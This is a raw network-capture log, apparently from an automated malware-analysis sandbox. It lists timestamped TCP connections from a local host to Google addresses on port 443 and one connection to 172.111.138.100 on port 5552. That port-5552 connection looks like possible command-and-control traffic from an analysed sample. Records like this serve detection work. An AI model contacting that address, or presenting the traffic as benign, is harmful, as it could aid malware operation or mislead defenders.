                                                                                                                                                                            Dec 30, 2024 11:49:19.471817970 CET44349775142.250.185.78192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:19.471882105 CET44349775142.250.185.78192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:19.471896887 CET49775443192.168.2.8142.250.185.78
                                                                                                                                                                            Dec 30, 2024 11:49:19.471955061 CET49775443192.168.2.8142.250.185.78
                                                                                                                                                                            Dec 30, 2024 11:49:19.473691940 CET49775443192.168.2.8142.250.185.78
                                                                                                                                                                            Dec 30, 2024 11:49:19.473691940 CET49775443192.168.2.8142.250.185.78
                                                                                                                                                                            Dec 30, 2024 11:49:19.473717928 CET44349775142.250.185.78192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:19.474633932 CET49775443192.168.2.8142.250.185.78
                                                                                                                                                                            Dec 30, 2024 11:49:19.474633932 CET49780443192.168.2.8142.250.185.78
                                                                                                                                                                            Dec 30, 2024 11:49:19.474678993 CET44349780142.250.185.78192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:19.475337029 CET49780443192.168.2.8142.250.185.78
                                                                                                                                                                            Dec 30, 2024 11:49:19.475697041 CET49780443192.168.2.8142.250.185.78
                                                                                                                                                                            Dec 30, 2024 11:49:19.475713968 CET44349780142.250.185.78192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:19.496907949 CET44349774142.250.185.161192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:19.496959925 CET44349774142.250.185.161192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:19.497011900 CET49774443192.168.2.8142.250.185.161
                                                                                                                                                                            Dec 30, 2024 11:49:19.497033119 CET44349774142.250.185.161192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:19.497067928 CET49774443192.168.2.8142.250.185.161
                                                                                                                                                                            Dec 30, 2024 11:49:19.497073889 CET44349774142.250.185.161192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:19.497085094 CET44349774142.250.185.161192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:19.497107983 CET49774443192.168.2.8142.250.185.161
                                                                                                                                                                            Dec 30, 2024 11:49:19.497128010 CET49774443192.168.2.8142.250.185.161
                                                                                                                                                                            Dec 30, 2024 11:49:19.500052929 CET49774443192.168.2.8142.250.185.161
                                                                                                                                                                            Dec 30, 2024 11:49:19.500075102 CET44349774142.250.185.161192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:19.500564098 CET49781443192.168.2.8142.250.185.161
                                                                                                                                                                            Dec 30, 2024 11:49:19.500593901 CET44349781142.250.185.161192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:19.500983953 CET49781443192.168.2.8142.250.185.161
                                                                                                                                                                            Dec 30, 2024 11:49:19.501260042 CET49781443192.168.2.8142.250.185.161
                                                                                                                                                                            Dec 30, 2024 11:49:19.501271963 CET44349781142.250.185.161192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:20.060987949 CET44349778142.250.185.161192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:20.061115980 CET49778443192.168.2.8142.250.185.161
                                                                                                                                                                            Dec 30, 2024 11:49:20.062074900 CET49778443192.168.2.8142.250.185.161
                                                                                                                                                                            Dec 30, 2024 11:49:20.062089920 CET44349778142.250.185.161192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:20.062310934 CET49778443192.168.2.8142.250.185.161
                                                                                                                                                                            Dec 30, 2024 11:49:20.062318087 CET44349778142.250.185.161192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:20.080107927 CET44349779142.250.185.78192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:20.080213070 CET49779443192.168.2.8142.250.185.78
                                                                                                                                                                            Dec 30, 2024 11:49:20.087049961 CET49779443192.168.2.8142.250.185.78
                                                                                                                                                                            Dec 30, 2024 11:49:20.087058067 CET44349779142.250.185.78192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:20.087301016 CET49779443192.168.2.8142.250.185.78
                                                                                                                                                                            Dec 30, 2024 11:49:20.087305069 CET44349779142.250.185.78192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:20.106949091 CET44349780142.250.185.78192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:20.107074022 CET49780443192.168.2.8142.250.185.78
                                                                                                                                                                            Dec 30, 2024 11:49:20.107661009 CET49780443192.168.2.8142.250.185.78
                                                                                                                                                                            Dec 30, 2024 11:49:20.107670069 CET44349780142.250.185.78192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:20.107749939 CET49780443192.168.2.8142.250.185.78
                                                                                                                                                                            Dec 30, 2024 11:49:20.107764006 CET44349780142.250.185.78192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:20.130537987 CET44349781142.250.185.161192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:20.130603075 CET49781443192.168.2.8142.250.185.161
                                                                                                                                                                            Dec 30, 2024 11:49:20.131635904 CET49781443192.168.2.8142.250.185.161
                                                                                                                                                                            Dec 30, 2024 11:49:20.131644964 CET44349781142.250.185.161192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:20.131814957 CET49781443192.168.2.8142.250.185.161
                                                                                                                                                                            Dec 30, 2024 11:49:20.131820917 CET44349781142.250.185.161192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:20.460405111 CET44349779142.250.185.78192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:20.460596085 CET49779443192.168.2.8142.250.185.78
                                                                                                                                                                            Dec 30, 2024 11:49:20.460797071 CET49779443192.168.2.8142.250.185.78
                                                                                                                                                                            Dec 30, 2024 11:49:20.460845947 CET44349779142.250.185.78192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:20.460999966 CET44349779142.250.185.78192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:20.461064100 CET49779443192.168.2.8142.250.185.78
                                                                                                                                                                            Dec 30, 2024 11:49:20.461064100 CET49779443192.168.2.8142.250.185.78
                                                                                                                                                                            Dec 30, 2024 11:49:20.461807013 CET49782443192.168.2.8142.250.185.78
                                                                                                                                                                            Dec 30, 2024 11:49:20.461848974 CET44349782142.250.185.78192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:20.462012053 CET49782443192.168.2.8142.250.185.78
                                                                                                                                                                            Dec 30, 2024 11:49:20.462264061 CET49782443192.168.2.8142.250.185.78
                                                                                                                                                                            Dec 30, 2024 11:49:20.462276936 CET44349782142.250.185.78192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:20.487082005 CET44349780142.250.185.78192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:20.487206936 CET49780443192.168.2.8142.250.185.78
                                                                                                                                                                            Dec 30, 2024 11:49:20.487334967 CET49780443192.168.2.8142.250.185.78
                                                                                                                                                                            Dec 30, 2024 11:49:20.487375021 CET44349780142.250.185.78192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:20.487529039 CET49780443192.168.2.8142.250.185.78
                                                                                                                                                                            Dec 30, 2024 11:49:20.487916946 CET49783443192.168.2.8142.250.185.78
                                                                                                                                                                            Dec 30, 2024 11:49:20.487961054 CET44349783142.250.185.78192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:20.488969088 CET49783443192.168.2.8142.250.185.78
                                                                                                                                                                            Dec 30, 2024 11:49:20.489376068 CET49783443192.168.2.8142.250.185.78
                                                                                                                                                                            Dec 30, 2024 11:49:20.489388943 CET44349783142.250.185.78192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:20.498755932 CET44349778142.250.185.161192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:20.498847961 CET44349778142.250.185.161192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:20.498846054 CET49778443192.168.2.8142.250.185.161
                                                                                                                                                                            Dec 30, 2024 11:49:20.498888969 CET44349778142.250.185.161192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:20.498914957 CET49778443192.168.2.8142.250.185.161
                                                                                                                                                                            Dec 30, 2024 11:49:20.498960972 CET49778443192.168.2.8142.250.185.161
                                                                                                                                                                            Dec 30, 2024 11:49:20.498967886 CET44349778142.250.185.161192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:20.499010086 CET49778443192.168.2.8142.250.185.161
                                                                                                                                                                            Dec 30, 2024 11:49:20.499016047 CET44349778142.250.185.161192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:20.499031067 CET44349778142.250.185.161192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:20.499078035 CET49778443192.168.2.8142.250.185.161
                                                                                                                                                                            Dec 30, 2024 11:49:20.499094963 CET49778443192.168.2.8142.250.185.161
                                                                                                                                                                            Dec 30, 2024 11:49:20.500230074 CET49778443192.168.2.8142.250.185.161
                                                                                                                                                                            Dec 30, 2024 11:49:20.500252962 CET44349778142.250.185.161192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:20.501043081 CET49784443192.168.2.8142.250.185.161
                                                                                                                                                                            Dec 30, 2024 11:49:20.501096964 CET44349784142.250.185.161192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:20.501415014 CET49784443192.168.2.8142.250.185.161
                                                                                                                                                                            Dec 30, 2024 11:49:20.501667023 CET49784443192.168.2.8142.250.185.161
                                                                                                                                                                            Dec 30, 2024 11:49:20.501689911 CET44349784142.250.185.161192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:20.546173096 CET44349781142.250.185.161192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:20.546228886 CET44349781142.250.185.161192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:20.546264887 CET49781443192.168.2.8142.250.185.161
                                                                                                                                                                            Dec 30, 2024 11:49:20.546298027 CET44349781142.250.185.161192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:20.546323061 CET49781443192.168.2.8142.250.185.161
                                                                                                                                                                            Dec 30, 2024 11:49:20.546386003 CET49781443192.168.2.8142.250.185.161
                                                                                                                                                                            Dec 30, 2024 11:49:20.546691895 CET44349781142.250.185.161192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:20.546730995 CET44349781142.250.185.161192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:20.546775103 CET49781443192.168.2.8142.250.185.161
                                                                                                                                                                            Dec 30, 2024 11:49:20.547462940 CET49781443192.168.2.8142.250.185.161
                                                                                                                                                                            Dec 30, 2024 11:49:20.547477007 CET44349781142.250.185.161192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:20.548685074 CET49785443192.168.2.8142.250.185.161
                                                                                                                                                                            Dec 30, 2024 11:49:20.548728943 CET44349785142.250.185.161192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:20.548801899 CET49785443192.168.2.8142.250.185.161
                                                                                                                                                                            Dec 30, 2024 11:49:20.549052000 CET49785443192.168.2.8142.250.185.161
                                                                                                                                                                            Dec 30, 2024 11:49:20.549072981 CET44349785142.250.185.161192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:21.092852116 CET44349782142.250.185.78192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:21.093004942 CET49782443192.168.2.8142.250.185.78
                                                                                                                                                                            Dec 30, 2024 11:49:21.093641043 CET44349782142.250.185.78192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:21.093741894 CET49782443192.168.2.8142.250.185.78
                                                                                                                                                                            Dec 30, 2024 11:49:21.110702038 CET44349784142.250.185.161192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:21.113476038 CET49784443192.168.2.8142.250.185.161
                                                                                                                                                                            Dec 30, 2024 11:49:21.117788076 CET44349783142.250.185.78192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:21.117961884 CET49783443192.168.2.8142.250.185.78
                                                                                                                                                                            Dec 30, 2024 11:49:21.118513107 CET44349783142.250.185.78192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:21.118577957 CET49783443192.168.2.8142.250.185.78
                                                                                                                                                                            Dec 30, 2024 11:49:21.166130066 CET44349785142.250.185.161192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:21.169523954 CET49785443192.168.2.8142.250.185.161
                                                                                                                                                                            Dec 30, 2024 11:49:21.246346951 CET49785443192.168.2.8142.250.185.161
                                                                                                                                                                            Dec 30, 2024 11:49:21.246361017 CET44349785142.250.185.161192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:21.248449087 CET49785443192.168.2.8142.250.185.161
                                                                                                                                                                            Dec 30, 2024 11:49:21.248459101 CET44349785142.250.185.161192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:21.256606102 CET49783443192.168.2.8142.250.185.78
                                                                                                                                                                            Dec 30, 2024 11:49:21.256628036 CET44349783142.250.185.78192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:21.256974936 CET44349783142.250.185.78192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:21.257036924 CET49783443192.168.2.8142.250.185.78
                                                                                                                                                                            Dec 30, 2024 11:49:21.258239031 CET49783443192.168.2.8142.250.185.78
                                                                                                                                                                            Dec 30, 2024 11:49:21.274543047 CET49782443192.168.2.8142.250.185.78
                                                                                                                                                                            Dec 30, 2024 11:49:21.274566889 CET44349782142.250.185.78192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:21.274980068 CET44349782142.250.185.78192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:21.276376009 CET49782443192.168.2.8142.250.185.78
                                                                                                                                                                            Dec 30, 2024 11:49:21.279347897 CET49782443192.168.2.8142.250.185.78
                                                                                                                                                                            Dec 30, 2024 11:49:21.279558897 CET49784443192.168.2.8142.250.185.161
                                                                                                                                                                            Dec 30, 2024 11:49:21.279583931 CET44349784142.250.185.161192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:21.279846907 CET49784443192.168.2.8142.250.185.161
                                                                                                                                                                            Dec 30, 2024 11:49:21.279855013 CET44349784142.250.185.161192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:21.299335003 CET44349783142.250.185.78192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:21.323328018 CET44349782142.250.185.78192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:21.552201033 CET44349783142.250.185.78192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:21.552258968 CET49783443192.168.2.8142.250.185.78
                                                                                                                                                                            Dec 30, 2024 11:49:21.552273035 CET44349783142.250.185.78192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:21.553354979 CET49783443192.168.2.8142.250.185.78
                                                                                                                                                                            Dec 30, 2024 11:49:21.553363085 CET44349783142.250.185.78192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:21.553388119 CET44349783142.250.185.78192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:21.554307938 CET49783443192.168.2.8142.250.185.78
                                                                                                                                                                            Dec 30, 2024 11:49:21.555972099 CET49783443192.168.2.8142.250.185.78
                                                                                                                                                                            Dec 30, 2024 11:49:21.555998087 CET44349783142.250.185.78192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:21.556699038 CET49787443192.168.2.8142.250.185.78
                                                                                                                                                                            Dec 30, 2024 11:49:21.556740046 CET44349787142.250.185.78192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:21.556823969 CET49787443192.168.2.8142.250.185.78
                                                                                                                                                                            Dec 30, 2024 11:49:21.557049990 CET49787443192.168.2.8142.250.185.78
                                                                                                                                                                            Dec 30, 2024 11:49:21.557055950 CET44349787142.250.185.78192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:21.568396091 CET44349785142.250.185.161192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:21.568440914 CET44349785142.250.185.161192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:21.568562984 CET49785443192.168.2.8142.250.185.161
                                                                                                                                                                            Dec 30, 2024 11:49:21.568562984 CET49785443192.168.2.8142.250.185.161
                                                                                                                                                                            Dec 30, 2024 11:49:21.568578005 CET44349785142.250.185.161192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:21.568836927 CET44349785142.250.185.161192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:21.568888903 CET49785443192.168.2.8142.250.185.161
                                                                                                                                                                            Dec 30, 2024 11:49:21.569443941 CET49785443192.168.2.8142.250.185.161
                                                                                                                                                                            Dec 30, 2024 11:49:21.569468021 CET44349785142.250.185.161192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:21.570559978 CET49788443192.168.2.8142.250.185.161
                                                                                                                                                                            Dec 30, 2024 11:49:21.570604086 CET44349788142.250.185.161192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:21.571662903 CET49788443192.168.2.8142.250.185.161
                                                                                                                                                                            Dec 30, 2024 11:49:21.571664095 CET49788443192.168.2.8142.250.185.161
                                                                                                                                                                            Dec 30, 2024 11:49:21.571701050 CET44349788142.250.185.161192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:21.571744919 CET44349782142.250.185.78192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:21.571938038 CET49782443192.168.2.8142.250.185.78
                                                                                                                                                                            Dec 30, 2024 11:49:21.571955919 CET44349782142.250.185.78192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:21.572007895 CET44349782142.250.185.78192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:21.572115898 CET49782443192.168.2.8142.250.185.78
                                                                                                                                                                            Dec 30, 2024 11:49:21.572115898 CET49782443192.168.2.8142.250.185.78
                                                                                                                                                                            Dec 30, 2024 11:49:21.572372913 CET49782443192.168.2.8142.250.185.78
                                                                                                                                                                            Dec 30, 2024 11:49:21.572372913 CET49782443192.168.2.8142.250.185.78
                                                                                                                                                                            Dec 30, 2024 11:49:21.572385073 CET44349782142.250.185.78192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:21.572523117 CET49782443192.168.2.8142.250.185.78
                                                                                                                                                                            Dec 30, 2024 11:49:21.578886032 CET49789443192.168.2.8142.250.185.78
                                                                                                                                                                            Dec 30, 2024 11:49:21.578922987 CET44349789142.250.185.78192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:21.578982115 CET49789443192.168.2.8142.250.185.78
                                                                                                                                                                            Dec 30, 2024 11:49:21.579535961 CET49789443192.168.2.8142.250.185.78
                                                                                                                                                                            Dec 30, 2024 11:49:21.579550028 CET44349789142.250.185.78192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:21.714755058 CET44349784142.250.185.161192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:21.714806080 CET44349784142.250.185.161192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:21.714848042 CET49784443192.168.2.8142.250.185.161
                                                                                                                                                                            Dec 30, 2024 11:49:21.714848042 CET49784443192.168.2.8142.250.185.161
                                                                                                                                                                            Dec 30, 2024 11:49:21.714886904 CET44349784142.250.185.161192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:21.714916945 CET44349784142.250.185.161192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:21.717358112 CET49784443192.168.2.8142.250.185.161
                                                                                                                                                                            Dec 30, 2024 11:49:21.731309891 CET49784443192.168.2.8142.250.185.161
                                                                                                                                                                            Dec 30, 2024 11:49:21.731359959 CET44349784142.250.185.161192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:21.732485056 CET49790443192.168.2.8142.250.185.161
                                                                                                                                                                            Dec 30, 2024 11:49:21.732532024 CET44349790142.250.185.161192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:21.732649088 CET49790443192.168.2.8142.250.185.161
                                                                                                                                                                            Dec 30, 2024 11:49:21.733177900 CET49790443192.168.2.8142.250.185.161
                                                                                                                                                                            Dec 30, 2024 11:49:21.733191013 CET44349790142.250.185.161192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:22.180588961 CET44349788142.250.185.161192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:22.181353092 CET49788443192.168.2.8142.250.185.161
                                                                                                                                                                            Dec 30, 2024 11:49:22.181880951 CET49788443192.168.2.8142.250.185.161
                                                                                                                                                                            Dec 30, 2024 11:49:22.181886911 CET44349788142.250.185.161192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:22.182101965 CET49788443192.168.2.8142.250.185.161
                                                                                                                                                                            Dec 30, 2024 11:49:22.182106018 CET44349788142.250.185.161192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:22.182698011 CET44349789142.250.185.78192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:22.182765961 CET49789443192.168.2.8142.250.185.78
                                                                                                                                                                            Dec 30, 2024 11:49:22.196762085 CET49789443192.168.2.8142.250.185.78
                                                                                                                                                                            Dec 30, 2024 11:49:22.196778059 CET44349789142.250.185.78192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:22.197345018 CET49789443192.168.2.8142.250.185.78
                                                                                                                                                                            Dec 30, 2024 11:49:22.197354078 CET44349789142.250.185.78192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:22.246944904 CET44349787142.250.185.78192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:22.247051001 CET49787443192.168.2.8142.250.185.78
                                                                                                                                                                            Dec 30, 2024 11:49:22.247540951 CET49787443192.168.2.8142.250.185.78
                                                                                                                                                                            Dec 30, 2024 11:49:22.247548103 CET44349787142.250.185.78192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:22.247746944 CET49787443192.168.2.8142.250.185.78
                                                                                                                                                                            Dec 30, 2024 11:49:22.247755051 CET44349787142.250.185.78192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:22.336606026 CET44349790142.250.185.161192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:22.336664915 CET49790443192.168.2.8142.250.185.161
                                                                                                                                                                            Dec 30, 2024 11:49:22.337357044 CET49790443192.168.2.8142.250.185.161
                                                                                                                                                                            Dec 30, 2024 11:49:22.337363005 CET44349790142.250.185.161192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:22.337666988 CET49790443192.168.2.8142.250.185.161
                                                                                                                                                                            Dec 30, 2024 11:49:22.337671995 CET44349790142.250.185.161192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:22.464723110 CET49788443192.168.2.8142.250.185.161
                                                                                                                                                                            Dec 30, 2024 11:49:22.464854002 CET49789443192.168.2.8142.250.185.78
                                                                                                                                                                            Dec 30, 2024 11:49:22.464880943 CET49787443192.168.2.8142.250.185.78
                                                                                                                                                                            Dec 30, 2024 11:49:22.464911938 CET49790443192.168.2.8142.250.185.161
                                                                                                                                                                            Dec 30, 2024 11:49:22.467205048 CET49794443192.168.2.8142.250.185.78
                                                                                                                                                                            Dec 30, 2024 11:49:22.467252970 CET44349794142.250.185.78192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:22.467325926 CET49794443192.168.2.8142.250.185.78
                                                                                                                                                                            Dec 30, 2024 11:49:22.666997910 CET49795443192.168.2.8142.250.185.78
                                                                                                                                                                            Dec 30, 2024 11:49:22.667043924 CET44349795142.250.185.78192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:22.667108059 CET49795443192.168.2.8142.250.185.78
                                                                                                                                                                            Dec 30, 2024 11:49:22.667736053 CET49794443192.168.2.8142.250.185.78
                                                                                                                                                                            Dec 30, 2024 11:49:22.667768002 CET44349794142.250.185.78192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:22.668750048 CET49795443192.168.2.8142.250.185.78
                                                                                                                                                                            Dec 30, 2024 11:49:22.668764114 CET44349795142.250.185.78192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:22.887182951 CET497965552192.168.2.8172.111.138.100
                                                                                                                                                                            Dec 30, 2024 11:49:22.892002106 CET555249796172.111.138.100192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:22.892082930 CET497965552192.168.2.8172.111.138.100
                                                                                                                                                                            Dec 30, 2024 11:49:22.892518997 CET497965552192.168.2.8172.111.138.100
                                                                                                                                                                            Dec 30, 2024 11:49:22.897339106 CET555249796172.111.138.100192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:23.278582096 CET44349794142.250.185.78192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:23.278666019 CET49794443192.168.2.8142.250.185.78
                                                                                                                                                                            Dec 30, 2024 11:49:23.279052973 CET44349795142.250.185.78192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:23.279499054 CET49794443192.168.2.8142.250.185.78
                                                                                                                                                                            Dec 30, 2024 11:49:23.279510975 CET44349794142.250.185.78192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:23.279547930 CET49795443192.168.2.8142.250.185.78
                                                                                                                                                                            Dec 30, 2024 11:49:23.281958103 CET49794443192.168.2.8142.250.185.78
                                                                                                                                                                            Dec 30, 2024 11:49:23.281965971 CET44349794142.250.185.78192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:23.282934904 CET49795443192.168.2.8142.250.185.78
                                                                                                                                                                            Dec 30, 2024 11:49:23.282952070 CET44349795142.250.185.78192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:23.283453941 CET49795443192.168.2.8142.250.185.78
                                                                                                                                                                            Dec 30, 2024 11:49:23.283461094 CET44349795142.250.185.78192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:23.655534983 CET44349795142.250.185.78192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:23.657453060 CET49795443192.168.2.8142.250.185.78
                                                                                                                                                                            Dec 30, 2024 11:49:23.658499956 CET44349795142.250.185.78192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:23.658560991 CET44349795142.250.185.78192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:23.658718109 CET49795443192.168.2.8142.250.185.78
                                                                                                                                                                            Dec 30, 2024 11:49:23.662404060 CET44349794142.250.185.78192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:23.665426970 CET49794443192.168.2.8142.250.185.78
                                                                                                                                                                            Dec 30, 2024 11:49:23.665456057 CET44349794142.250.185.78192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:23.666795015 CET44349794142.250.185.78192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:23.666860104 CET49794443192.168.2.8142.250.185.78
                                                                                                                                                                            Dec 30, 2024 11:49:23.688188076 CET49795443192.168.2.8142.250.185.78
                                                                                                                                                                            Dec 30, 2024 11:49:23.688221931 CET44349795142.250.185.78192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:23.688237906 CET49795443192.168.2.8142.250.185.78
                                                                                                                                                                            Dec 30, 2024 11:49:23.689059019 CET49795443192.168.2.8142.250.185.78
                                                                                                                                                                            Dec 30, 2024 11:49:23.692012072 CET49794443192.168.2.8142.250.185.78
                                                                                                                                                                            Dec 30, 2024 11:49:23.692042112 CET44349794142.250.185.78192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:23.692657948 CET49798443192.168.2.8142.250.185.161
                                                                                                                                                                            Dec 30, 2024 11:49:23.692699909 CET44349798142.250.185.161192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:23.692894936 CET49799443192.168.2.8142.250.185.78
                                                                                                                                                                            Dec 30, 2024 11:49:23.692899942 CET49798443192.168.2.8142.250.185.161
                                                                                                                                                                            Dec 30, 2024 11:49:23.692934990 CET44349799142.250.185.78192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:23.693000078 CET49800443192.168.2.8142.250.185.78
                                                                                                                                                                            Dec 30, 2024 11:49:23.693037987 CET44349800142.250.185.78192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:23.693099976 CET49800443192.168.2.8142.250.185.78
                                                                                                                                                                            Dec 30, 2024 11:49:23.693100929 CET49799443192.168.2.8142.250.185.78
                                                                                                                                                                            Dec 30, 2024 11:49:23.693327904 CET49798443192.168.2.8142.250.185.161
                                                                                                                                                                            Dec 30, 2024 11:49:23.693341017 CET44349798142.250.185.161192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:23.693396091 CET49800443192.168.2.8142.250.185.78
                                                                                                                                                                            Dec 30, 2024 11:49:23.693406105 CET44349800142.250.185.78192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:23.693506002 CET49799443192.168.2.8142.250.185.78
                                                                                                                                                                            Dec 30, 2024 11:49:23.693516016 CET44349799142.250.185.78192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:23.728892088 CET49797443192.168.2.8142.250.185.161
                                                                                                                                                                            Dec 30, 2024 11:49:23.728931904 CET44349797142.250.185.161192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:23.729002953 CET49797443192.168.2.8142.250.185.161
                                                                                                                                                                            Dec 30, 2024 11:49:24.052145004 CET49797443192.168.2.8142.250.185.161
                                                                                                                                                                            Dec 30, 2024 11:49:24.052177906 CET44349797142.250.185.161192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:24.296058893 CET44349800142.250.185.78192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:24.296124935 CET49800443192.168.2.8142.250.185.78
                                                                                                                                                                            Dec 30, 2024 11:49:24.298932076 CET44349798142.250.185.161192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:24.299041986 CET49798443192.168.2.8142.250.185.161
